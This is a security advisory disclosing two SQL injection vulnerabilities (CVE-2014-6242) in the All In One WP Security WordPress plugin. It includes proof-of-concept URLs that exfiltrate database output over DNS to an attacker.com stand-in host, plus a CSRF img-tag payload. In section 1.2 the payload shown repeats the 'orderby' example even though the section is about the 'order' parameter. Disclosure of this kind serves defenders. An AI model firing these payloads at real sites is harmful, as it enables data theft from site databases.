Two SQL Injections in All In One WP Security WordPress plugin

2014-09-03T00:00:00
ID HTB23231
Type htbridge
Reporter High-Tech Bridge
Modified 2014-09-18T00:00:00

Description

High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector.

1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242

1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "orderby" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "orderby" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for version() (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):

http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20 load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29, CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899 %29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR %28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111% 29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29

This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.:

http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20l oad_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,C HAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899% 29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR% 28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%2 9,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29

1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "order" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "order" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for version() (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):

http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20 load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29, CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899 %29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR %28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111% 29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29

This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with CSRF exploit, e.g.:

<img src="http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28sele ct%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%2 9%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR %2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29 ,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%2 8111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29">